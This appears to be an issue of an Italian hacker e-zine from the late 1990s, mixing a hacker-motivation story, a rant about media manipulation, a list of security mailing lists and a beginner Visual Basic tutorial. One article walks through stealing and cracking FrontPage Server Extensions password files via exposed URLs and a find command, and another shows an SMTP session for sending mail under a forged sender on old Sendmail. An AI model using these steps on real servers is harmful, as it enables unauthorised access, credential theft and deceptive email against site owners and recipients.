The end

Dov'Š la metafora???
Ora voi mi chiederete appunto "Dov'Š la metafora???" io vi risponderei "kakkio
ci sono 30mila metafore in questo racconto e non ne avete scovata neanche una???"
:-)
Il racconto Š una metafora della vita di ogni Hacker ed in generale della vita di ognuno di noi :
1-Il ragazzo voleva raggiungere un obbiettivo ma ha dovuto sudare per raggiungerlo,
ha cercato di reperire informazioni per diventare un wolf-hunter cos ogni Hacker
per tentare di imparare tenta di reperire informazioni in ogni modo (vedi Docz
Tutorials ect. ect.) ma esse sono sempre confuse ed alle volte piene di elementi
superflui da scartare, il buon allievo deve saper scartare le superflue per
badare alle essenziali.
2-Trovi sempre qualcuno, anche il tuo + fedele amico(padre) che Š pronto a
denigrare il tuo lavoro e a tentare di affondare le tue buone idee.
3-Avvicinati con cautela all'hacking e prendi tutte le possibili precauzioni.
4-Ogni giorno pian piano allenandoti vicino al comp cerca di diventargli
sempre + amico e di passare il maggior tempo possibile vicino ad esso.
(imbocca la lupa giorno per giorno)
5-Una volta diventato lupa (hacker) ricordati sempre che il tuo animo deve
essere per met… quello del cowboy (paziente e di poche parole) e per met…
quello della lupa (aggressivo spietato e cattivo)
6-Quando pensi di essere riuscito a fare ci• che volevi la maggior parte delle
volte non Š cos (non dire gatto se non ce l'hai nel sacco!!)
7-Anche se non riesci nel tuo scopo, non demordere mai, se hai la testa dura
come il piombo, ed una volont… di ferro,ce la farai!!!!
8-Non lasciare mai che tu sia esposto o paragonato ad un fenomeno da baraccone.
(non dire in giro ci• che fai o ci• che sai fare).
9-Spesso ti troverai a combattere, solo quando sarai allo stremo delle tue
forze e solo allora si vedr… veramente quanto vali.
10-Troverai sempre qualcuno pronto a scommettere contro di te. Sii calmo come
il cow-boy ma lotta come la lupa. Mettiglielo nel culo a quei bastardi!!!!!
11-Esci dalla massa, fai un passo in + degli altri, sperimenta nuove tecniche ect. ect.
12-Trova sempre il coraggio di assumerti le tue responsabilit… di prenderti i tuoi
meriti, alza lo sguardo verso quello degli altri e digli "Es mia".

Beh penso proprio di aver finito ...... spero di essere stato abbastanza
esaudiente.....di avervi divertito e non annoiato.....di avervi arricchito
interiormente e magari che questa storia rimanga eterna in internet per sempre...kiss…?!?!?!

Vorrei dedicare questa storia un p• a tutti gli amici che la sera mi tengono
compagnia in IRC......DevilNet (a quando il prossimo soft phreakin' assault???)
:-)Game (il gioco non finisce mai) Nemo Razorinfo Roby 02 Bypo Eh(m)m Lucy (una
BOTta e via!!!) Net_G Linbus NSOFT drx ghost e sopratutto MsBliSs ***My net-girl-friend***
insomma tutti gli amici di #darkplace #hacker.it #hackers.it e #phreak.it. irc.stealth.net

By Dante Alighieri :-)

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ Manipolati SI Manipolati NO?! ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

MATERIALE: Una penna di struzzo una boccietta di inchiostro di china ed una pergamena circa del 1700.
ORE: Preferibilmente ore pasti al numero in sovraimpressione, hum mi s… che non centra nulla, humm vabbŠ :)
OGGETTO: Manipolati SI Manipolati NO?! (fottiamo il sistema?!)
SCOPO: BHO informativo?! BHO!? fatene quello che volete, IO non centro nulla :)

INIZIO!!!!!!!!!!!!

PRIMA DI TUTTO RINGRAZIO ZEROCOOL E NOBODY88 PER AVERMI FATTO PARTECIPE DELLA
LORO INIZIATIVA CHE DOVREBBE ESSERE D'ESEMPIO :-), E POI PERCHÔ SONO DEI
MATTACCHIONI DELLA RETE CHE NESSUNO SA MA SONO DEI POLIZIOTTI CON LA PANCIA ED
I BAFFONI ORMAI SCOLORITI DALLA NICOTINA, E CON LE PALLE IRRITATE DALLE GRATTATE
DI ORE ED ORE SEDUTI SU UNA SEDIA BRUTTA E VECCHIA (Ô TUTTO VEROOOOOO) :)))))))))

ALLURA inizio rompendovi un p• le palle cercando di farvi capire, che non sono
un istigatore ne un rivoluzionario che cerca di minare il nostro bellissimo
sistema (PRUUURURURUUUU),quindi spero che non cercate di denunciarmi e farmi
diventare cos un esiliato politico :-).
Adesso spero abbiate capito tutto, anche se c'Š poco da capire, iniziamo con
spiegare semplicemente con qualche esempio, il perchŠ dobbiamo non credere a
tutto ci• che ci propinano, e che il nostro sistema (intendo tutto il sistema
non solo quello italiano) ci manipola:
{{{HALT!! quasi dimenticavo, non st• scivendo una BIBBIA quindi potete
anche ridere e pensare: ma questo Š propio BIP BIP BIP BIP BIP BIP BIP BIP e
cos via:-) leggete con poca o molta attenzione per poi elaborare e magari
demolire la mia idea, d• liberta di parola IO!! :-) }}}
OK a posto adesso si pu• iniziare, il mio motto Š semplice, conciso, ma EFFICACE.
PerchŠ Š propio quello che non fanno i mass-media che con la mal informazione
tendono la maggior parte di noi in uno stato di semi catalessi e ignoranza,
attenzione per mal informazione si intende informazione non fatta male, ma
propio un informazione cattiva, nel senso che le informazioni vengono passate
al pubblico in maniera molto efficente ma allo stesso tempo sono informazioni
cattive e cioŠ PILOTATE; voi vi chiederete: ma pilotata da chi??????????, ed
io vi rispondo ma dal SISTEMA ovviamente che allo stesso tempo viene pilotato
dai POLITICI che allo stesso tempo vengono pilotati dal SISTEMA, insomma noi
siamo il sistema che viene fatto da noi :-) heheh e qua ci dovete ragionare.
Adesso uno si chiede ma come f… a funzionare questo "sistema"???!, semplice,
basandosi sul fatto che la maggior parte della gente crede che sotto la poca
informazione ci sia un complotto (vedi la STORIA), il sistema fa
semplicemente l'opposto, cioŠ DICENDO TUTTO PER NON DIRE NULLA!!!
Facendoci credere che sia tutto come dicono loro ed imbambioccandoci come allocchi.
Un esempio veloce veloce?!

LE DROGHE

ALCOL= droga legale, e pubblica (soldi allo stato molti) che viene pure pubblicizzata
MA COCAINA EROINA ASHISH MARJUANA DROGHE SINTETICHE etcc...=
droghe illegali ma pubbliche, (soldi agli stati MOLTI DI PIU' DI QUELLE LEGALI
come l'ALCOL) credete che queste droghe entrino negli stati semplicemente
nelle gomme delle macchine o negli asciugamani??? tutto esclusivamente
illegalmente??? BHE se pensate di SI allora siete o state per cadere nella
"gabbia" del sistema, ma siete ancora in tempo ad "EVADEREEEEEEE".

A questo punto uno legge tutto ci• e dice: OK OK siamo manipolati ed allora???
come faccio a cercare di cambiare almeno nel mio piccolo, oppure come faccio a
fare le cose alla grande senza essere corrotto dal SISTEMA???!!
BHE prima di tutto, pensate con la vostra testa che Š gi… difficile, poi
bisogna lavorare nascosti per non venir "corrotti", e dato che avete prelevato
tutto ci• dalla RETE iniziate con il battervi per tenere la rete libera da
ogni tipo di manipolazione, magari seguendo i consigli riportati dai miei amici
qu di seguito.
ADOTTANDO OGNI TIPO DI SOLUZIONE DATA MAGARI
DAL TIPO DI PROGRAMMA CHE USERETE :-) :-)
;)

SpIRIToZ

POST/SCRITUM (P/S):D
SE NON VI PIACE, O VI PIACE, O VOLETE ESPRIMERE TUTTA LA VOSTRA
RABBIA SU QUELLO CHE HO SCRITTO, O VOLETE PRESENTARMI VOSTRA MOGLIE PERCHÔ
COLPITI DA QUELLO CHE HO SCRITTO :-) MI TROVATE:
^^^^^^spiritoz@nfmail.com^^^^^^ oppure su
#hacker.it ore pasti al seguente numero di telefono 055.144.255.222 az scusate mi
confondo sempre, quello Š il mio secondo lavoro :)
ciaooooooooooooooooooooooooooooooooooooooooooooooooooooooooo e leggete tutto
mi raccomando:-)))) e OCCHIO AGLI SBIRROZZI ZI ZI ZI ZI ZIZ IZ ZI ZI Z!!!!!!!

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ UN PO' DI MAILING LIST ESSENZIALI X HACKERS E NEWBIES ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

UN PO' DI MAILING LIST ESSENZIALI X HACKERS E NEWBIES

Ciao a tutti quello che vi parla e' CrazyCrom uno dei tanti newbie che ogni
sera si fa na sega mentale sopra ai doc e ai txt di gente con nomi assurdi che
spiegano questo e quello. N0bodY88 mi ha chiesto se volevo partecipare a quest'avventura
della ezine e io gli ho risposto "Caspiterina, ci puoi scommettere la terza gamba
che hai tra le altre due che ci sto!"
e cosi' eccomi qua. Siccome non ho molte
conoscenze a livello di H/P/C dato che anch'io come molti mi sono avvicinato
alla materia da poco, ho pensato di proporre un articolo sulle (o meglio un
elenco di) mailing list (purtroppo solo in inglese, e se ne conoscete in italiano
mandatemi una mail appena accendete il vostro computer) che possono interessare
sia quelli come me, quindi newbies, che quelli che sono nell'elite da mesi/anni,
perche', come si sa, non si finisce mai di imparare.
Le info da me qui elencate sono prese dalla FAQ Security Mailing Lists che ho
tradotto in parte. Riporto qui sotto l'elenco delle mailing liste imo (x chi
non sa cosa voglia dire = In My Opinion) piu' importanti e utili. Ma prima
qualcuno potrebbe dire..... "A che ****** puo' servire leggersi una mole
spropositata di lettere per di piu' in inglese?"
e io risponderei:

1) se non si sa l'inglese in rete (secondo me) oltre a www.repubblica.it non
si va molto avanti (senza offesa)
2) se voi potreste scegliere tra leggere dei txt del 1997 in inglese di un
certo XYZ che vive oltreoceano oppure avere info sugli ultimi bug scoperti
da poco nei vari prog e so cosa decidereste?

NOME = Alert
INDIRIZZO X REGISTRARSI = majordomo@iss.net
COME REGISTRARSI = mandare una email mettendo nel corpo "subscribe alert"
(non gli apici!!!!)
COME TOGLIERSI DALLA ML = mettere nel corpo della mail "unsubscribe alert"
(allo stesso indirizzo)
ULTERIORI INFO = questa e' una lista moderata che tratta argomenti quali l'annuncio
di nuovi prodotti per la sicurezza e degli aggiornamenti di tali
prodotti, la comunicazione di nuove vulnerabilita' trovate,
l'annuncio di nuove FAQ sulla sicurezza, e per ultimo la diffusione
delle tecniche e delle consapevolezze degli intrusi.

NOME = Best of Security
INDIRIZZO X REGISTRARSI = best-of-security-request@suburbia.net
COME REGISTRARSI = mandare una email mettendo nel corpo "subscribe best-of-security"
ULTERIORI INFO = questa e' una lista non moderata. Altre info le attendo io che
dal testo inglese non ho capito molto, quindi, piuttosto di
dire cazzate sto zitto...cmq dal nome non sembrerebbe parlare
di fiori o animali...

NOME = Bugtraq
INDIRIZZO X REGISTRARSI = listserv@netspace.org
COME REGISTRARSI= mandare una email mettendo nel corpo "SUBSCRIBE BUGTRAQ"
(tutto maiuscolo)
ULTERIORI INFO = questa e' una lista per particolareggiate discussioni sui
buchi/bug che possono compomettere la sicurezza dei sistemi
UNIX; tratta di cosa sono, come sfruttarli, e come fare x
sistemarli. Nel manifesto (si dice cosi'?) della lista e'
esplicitamente spiegato che "questa lista non si occupa di
come crackare i sistemi e di come sfruttare le loro vulnerabilita',
ma si occupa invece di definirli, riconoscerli e prevenire
l'uso dei buchi e i relativi rischi"
. Sono accettate dal
topic tutte le informazioni sui buchi e sulle backdoor
passate e presenti e sui prog sfruttanti tali vulnerabilita'
su sitemi UNIX.

NOME = COAST Security Archive
INDIRIZZO X REGISTRARSI = coast-request@cs.purdue.edu
COME REGISTRARSI = mandare una email mettendo nel corpo "SUBSCRIBE coast"
ULTERIORI INFO = La lista si occupa del Purdue's COAST Security Archive

NOME = Computer Privacy Digest
INDIRIZZO X REGISTRARSI = comp-privacy-request@uwm.edu
COME REGISTRARSI = mandare una email mettendo nel corpo "subscribe cpd"
ULTERIORI INFO = Il Computer PRIVACY Digest (un tempo Telecom Privacy Digest)
e' seguito da Leonard P. Levine ed e' collegato al ng
comp.society.privacy e tratta in sostanza degli effetti della
tecnologia sulla privacy. Se siete di quelli che vogliono
querelare qlc1 xche' vi ha chiamato co il vs vero nome, questa
ml e' fatta per voi...penso :-)

NOME = Computer Underground Digest
INDIRIZZO X REGISTRARSI = cu-digest-request@weber.ucsd.edu
COME REGISTRARSI = mandare una email mettendo nel corpo "SUB CUDIGEST" (tutto maiuscolo)
ULTERIORI INFO = CuD e' disponibile anche sotto forma di newsgroup come:
comp.society.cu-digest .

NOME = Euro Firewalls
INDIRIZZO X REGISTRARSI = majordomo@gbnet.net
COME REGISTRARSI = mandare una email mettendo nel corpo "SUBSCRIBE firewalls-uk email-addr"
dove email-addr sta per l'indirizzo in cui volete ricevere
la ml (es: "SUBSCRIBE firewalls-uk crazy@tin.it)
ULTERIORI INFO = Lista che tratta i firewalls del nostro continente.

NOME = Firewalls
INDIRIZZO X REGISTRARSI = majordomo@lists.gnac.net
COME REGISTRARSI = mandare una email mettendo nel corpo "
SUBSCRIBE firewalls"
ULTERIORI INFO = lista che tratta di utili info riguardo i firewall e come
implementare la loro sicurezza.

NOME = INFSEC-L Information System Security Forum
INDIRIZZO X REGISTRARSI = listserv@etsuadmn.etsu.edu
COME REGISTRARSI = mandare la email mettendo nel corpo"
SUB infsec.l your-name"
(y-n=vs nome) :P
ULTERIORI INFO = questa lista tratta di info su sistemi di sicurezza e argomenti correlati.

NOME = Intrusion Detection Systems
INDIRIZZO X REGISTRARSI = majordomo@uow.edu.au
COME REGISTRARSI = mandare una email mettendo nel corpo "
subscribe ids"
ULTERIORI INFO = questa lista tratta di tecniche usate x scoprire intrusi
nelle reti di computer (se li conoscete...li evitate :-),
di controlli dei filtri (non delle macchine...), di info su
conoscenze di sistemi esperti, reti neurali (se qualcuno ne
sa qlc mi scriva), metodi usati dagli intrusi, script e
strumenti usati dagli hackers (quelli che si stanno sbellicando
dalle risate sugli infiniti errori di questo mio articolo...)

NOME = NTBugtraq
INDIRIZZO X REGISTRARSI = listserv@listserv.ntbugtraq.com
COME REGISTRARSI = mandare una email mettendo nel corpo "
subscribe ntbugtraq"
COME TOGLIERSI DALLA ML = mandare una mail mettendo nel corpo "
unsubscribe ntbugtraq"
ULTERIORI INFO = questa lista tratta dei buchi/bug della sicurezza in Windows
NT e di coem sfruttare tali bug (exploit) x compromettere la
sicurezza del sistema NT.

NOME = NT Security
INDIRIZZO X REGISTRARSI = majordomo@iss.net
COME REGISTRARSI = mandare una email mettendo nel corpo "
subscribe ntsecurity"
COME TOGLIERSI DALLA ML = mandare un mail mettendo nel corpo "
unsubscribe ntsecurity"
ULTERIORI INFO = questa lista tratta della sicurezza di NT, e' una lista moderata.
Anche se dal nome non sembrerebbe questa ml tratta anche dei
problemi di Windows 95, Windows For Work Group riguardo alla sicurezza.

NOME = Phrack
INDIRIZZO X REGISTRARSI = phrack@well.com
COME REGISTRARSI = mandare una email mettendo nel corpo "
SUBSCRIBE Phrack"
ULTERIORI INFO = Phrack e' una e-zine/magazine americana che tratta sia di
hacking che di phreaking.

NOME = Secure HTTP
INDIRIZZO X REGISTRARSI = shttp-talk-request@OpenMarket.com
COME REGISTRARSI = mandare una email mettendo nel corpo "
SUBSCRIBE"
ULTERIORI INFO = questa lista serve a chi si interessa delle potenzialita' del SHTTP.

NOME = Virus
INDIRIZZO X REGISTRARSI = listserv@lehigh.edu
COME REGISTRARSI = mandare una email mettendo nel corpo "
SUBSCRIBE virus-l your-name"
ULTERIORI INFO = questa lista serve per le discussioni su vecchi virus e per le
proposte di nuove idee su virus; puo' includere le prevenzioni
da virus, e le domande/risposte su determinati virus; la lista
e' moderata ed e' presente nei newsgroup come comp.virus.

NOME = CERT (Computer Emergency Response Team) Advisory mailing list
INDIRIZZO X REGISTRARSI = cert@cert.org
COME REGISTRARSI = mandare una email mettendo nel corpo "
I want to be on your mailing list"
ULTERIORI INFO = l'ftp del CERT ha l'ip 192.88.209.5 e da li' potete scaricare
vecchie info gia passate sulla mailing list, accedendovi come
utente ANONYMOUS

NOME = Cryptography
INDIRIZZO X REGISTRARSI = majordomo@c2.net
COME REGISTRARSI = mandare una email mettendo nel corpo "
subscribe cryptography"
ULTERIORI INFO = questa lista si occupa della crittografia analizzandone sia
gli algoritmi e l'accortezza con i quali sono stati creati

Ora che vi ho fatto questo breve (mica tanto...) elenco delle ml ci tengo a
precisare che gli apici non vanno, in tutte si parla in inglese, e che se
almeno uno solo di voi si "
sottoscrivera' " qualcuna di queste ml allora il
mio lavoro sara' servito! Saluto tutti voi newbies e gli hacker che saranno
arrivati alla fine del mio articolo (veramente pochi...credo...hihihihihihi).
Un saluto speciale a N0bodY88, a ZeroCool e a tutto il Newbies Staff che forse
un giorno fara' parte del passato della scena italiana.........hihihihihihihi


PS: mi hanno appena comunicato che ci dovrebbe essere una mailing list sul C++
(so che non c'entra una mazza...forse) in ITALIANO e ci si puo' iscrivere
andando su http://welcome.to/C++Warriors
PSS: io non sono ancora andato a vedere la ml ma leggete un po' di msg prima
di postare, cosi' come si dovrebbe fare nei newsgroup.......in teoria.....

Ciauzzzz CrazyCrom

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ FRONTPAGE SERVER EXTENSIONS ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

******************************************************************************
Questo materiale e' scritto a puro scopo educativo ed informativo.
L'autore non ha responsabilit… alcuna sulle azioni che potrebbero essere
compiute dopo aver letto il seguente documento. Tutte le informazioni presenti
in questo documento si sarebbero potute trovare usando un motore di ricerca.
******************************************************************************

Bene bene, vorrei parlarvi di un bel programmino: FrontPage.

Come tutti saprete FrontPage (che chiamer• FP d'ora in avanti)
serve a creare siti web, per• in pi— rispetto a un semplice
editor Html ha la possibilit… di utilizzare dei programmini che
vengono forniti insieme.
Per il corretto funzionamento di questi programmini Š necessario
per• che nel server in qui andranno messi siti fatti con FP
siano installate le FrontPage Server Extensions.
Come sempre per i prodotti M$ la creazione di un nuovo prodotto
coincide con la scoperta di una nuova backdoor (ormai credo che
sia sempre pi— una politica aziendale 8oD).
Bene vediamo cosa mette a disposizione lo zio questa volta.

Poniamo il caso di un sysadmin che abbia Windows NT 4.0 e ISS 3.0
e che decida di installare le solite estensioni di FP.
Bene a sua insaputa FP creer… l'everyone group per avere accesso
al server tramite il FP Explorer.
Il punto Š che il sysadmin non lo sa e quindi l'accesso rimane
senza password permettendo cos a chiunque di modificare le sue
pagine Web!

Se questo non dovesse funzionare possiamo a provare a fare una
altra cosa. Apriamo il nostro browser e scriviamo:

http://www.sito.com/samples/search/queryhit.htm

Ora nella maschera di ricerca scriviamo service.pwd oppure *.pwd.
Se il sysadmin non ha modificato le impostazioni standard saremo
in grado di leggere ogni file nell'area di ricerca da lui scelta!
Ah per chi non lo sapesse nel file service.pwd ci sono delle
belle ed ambite password :-). Spiegher• poi come sfruttare questi
file, nel frattempo salvateli :-).

Ora zio Bill dice: "
Ma cazzo lo sanno tutti che NT fa schifo e
cos sanno anche che se non entro da questa porta entro dalle
finestre (Windows), facciamo qualcosa per incasinare anche Unix"
Voi direte: "
Ma chi Š cos imbecille da installarsi le estensioni
di FP per Unix?" Io vi rispondo: "Chi ha coraggio da vendere, chi
se ne frega della sicurezza e a chi importa solo fare soldi, in
pratica la maggior parte dei sysadmin"

Se avete una shell nel provider con installate le estensioni di
FP per Unix scrivete:

find / -name service.pwd -print

A volte avrete anche l'accesso in scrittura al file service.pwd
dunque potreste anche aggiungere degli account, vedete un po' voi
cosa vi conviene fare (personalmente sconsiglio di aggiungere
nuovi account).
Ma se non avete una shell non abbiate paura Š giusto dare a
tutti una possibilit…. Apriamo il nostro browser e scriviamo:

http://www.sito.com/_vti_pvt/service.pwd

e se i permessi d'accesso sono sbagliati (come lo sono facendo
l'installazione) vedremo il solito file delle password.

Ora a seconda dei casi nel file service.pwd troverete delle
righe di questo tipo:

root:PGhYLElPqvzEA
gianni:PvGmpP00M9suM

Non vi preoccupate la prima parte Š il login la seconda Š la
password criptata tramite l'algoritmo DES.
Ora prendete le righe e aggiungete un po' di roba come volete
per farla diventare come quella di qui sotto.

root:PGhYLElPqvzEA:0:0:cheneso:/:/bin/csh

Ora lanciate Cracker Jack, John the Ripper o quello che volte
e trovate le password. Se dopo questi account si rivelano
validi non solo per FP ma anche per le shell di quel server,
bhe non Š mica colpa vostra 8oD.

Per questa volta ho finito, magari la prossima volta faccio
un articoletto di Phreaking che sarebbe il mio campo naturale


P.S. La prima volta che vi capita di usare un password cracker
mettete dentro anche i 2 account di esempio e se trovate
le password speditemele all'indirizzo: blum@cybergal.com

Blum

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ E-mail assolutamente anonime! ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Created by AX1S

Allora, prima di tutto una piccola premessa:
questo metodo funziona, per quanto ne so, solo con un server SendMail versione
inferiore o uguale alla 8.8.8.
Forse si pu• usare anche con la 8.9 ma non ne sono sicuro.


io: Connect hostname.com 25
SMTP: 220 hostname.com ESMTP Sendmail 8.8.5/8.8.5; Thu, 28 Jan 1999 22:50:35 +0100
io: HELO (insrire qui almeno 600 lettere. Non so il numero preciso)
SMTP: Welcome il_mio_ip@iol.it please to meet you.
io: RSET
SMTP: Reset state
io: MAIL FROM: nessuno@niente.it
SMTP: sender ok!
io: RCPT TO: nome@vittima.it
SMTP: recepient ok!
io: DATA
SMTP: Enter mail, end with "
." on a line by itself
io: - messaggio -
.
io: Quit.

Attenzione!!! Quando si inserisce il nome falso del mittente bisogna usare
l'espressione nome@provider.com.
Inserendo "
anonymous", per esempio, sugli header apparir… questo:

Return-Path: <anonymous@0202.iol.it>

Non Š necessario che il nome del mittente esista davvero ma deve essere scritto
nella suddetta forma.

Un consiglio: per velocizzare l'operazione occorre avere un client telnet
in grado di fare le operazioni copia/incolla.Basterebbe infatti scrivere tutto
su un block notes e poi copiarlo.

Questo exploit vi rende anonimi a chi riceve la mail ma non per il server SMTP
che logga tutte le connessioni. Se preferite essere anonimi anche li allora
dovete connettervi al server di posta facendo una redirezione.

Ciaoz

AX1S

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ VISUAL BASIC TUTORIAL [ prima parte ] ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Ok ragazzi, benvenuti nel mondo del Visual Basic.
Questa "
guida" sar… un semplice strumento per introdurvi all'uso di questo
ambiente di sviluppo.
Prima di tutto cosa Š il Visual Basic? si tratta essenzialmente di un linguaggio
orientato agli oggetti. Semma sul significato di "
linugaggio orientato agli
oggetti" ci torneremo... non Š importatissimo per cominciare.
Per il momento ci limiteremo a dire che, generalmente, un OOL su basa sulla
gestione di eventi. Un evento altro non Š che un avvenimetno che si verifica
durante l'esecuzione del programma (Š un evento la pressione di un bottone,
la digitazione di qualcosa su una casella di testo e così via).
Noi (programmatori) dobbiamo creare una gestione degli eventi (ad es. decidiamo
cosa succede alla pressione di un bottone, ...).
Ma ora basta con le nozioncine, dedichiamoci a qualcosa di pi— pratico (se ho
lasciato qualcosa lo aggiunger• nei prossimi numeri).
Oggi parleremo della creazione di semplici form e faremo qualche esperimento
creando un semplice programma.
Un form Š una finestra; inizieremo inserrendo nel nostro form 2 CommandButton
(pulsante), 1 TextBox (casella di testo) e 1 Label (etichetta).
Ogni oggetto (form, pulsanti, etichette....... sono tutti oggetti) ha delle
propriet… (alcune delle quali possono essere modificate) e dei metodi.
Un metodo Š una funzione supportata dall'oggetto (ad es. possiamo, tramite
l'apposito metodo nei controlli directory, fare un refresh della directory
corrente).... questi li useremo successivamente.
Parliamo ora delle propriet…. Premendo con il tasto destro del mouse sul
CommandButton, l'ultima voce del men— di popup indicher… la voce "
propriet…"; cliccateci.
Nella finestra comparsa potrete modificare le propriet… dell'oggetto. Prima
di tutto il nome: button1 non Š molto esplicativo, e se all'inizio potrebbe
andare bene, con la creazine di programmi pi— complessi potrebbe non essere
abbastanza chiaro.
Quindi Š sempre opportuno dare un nome preciso ad ogni oggetto. Ad es., al
pulsante di uscita, gli daremo il nome "
cmdEsci".
Il prefisso "
cmd" lo usiamo per "ricordarci" che si tratta di un pulsante.
Ecco i prefissi pi— importanti:
cmd CommandButton
lbl Label
txt TextBox
frm Form
pic PictureBox
fra Frame
img Image
chk CheckBox
opt OptionButton
cmb Combobox
lst ListBox
drv DriveListBox
dir DirListBox
fil FileListBox

Ogni oggetto ha alcune propriet… caratteristiche ed altre comuni agli altri.
Le pi— comuni

  
(quelle che userete di pi—) sono:
Name Indica il nome del controllo (il form Š composto da controlli).
Useremo questo nome per far riferimento al controllo.
Caption Indica quello che sar… visualizzato sul controllo (per es.
il testo del CommandButton)
Enable Indica se il controllo pu• essere attivato o meno
Height Indica la distanza del lato in alto del controllo dal lato
superiore del Recipient (il Recipient lo spiegheremo molto
pi— avanti, per il momento sappiate che quello che usiamo pi—
spesso come Recipient Š il form)
Width Indica la distanza del lato sinistro del controllo dal lato
sinistro del Recipient
Visible Indica se il controllo Š visibile
...
Magari in uno dei prossimi numeri far• una tabella con tutte le propriet… e
i rispettivi controlli che le supportano... vedremo.

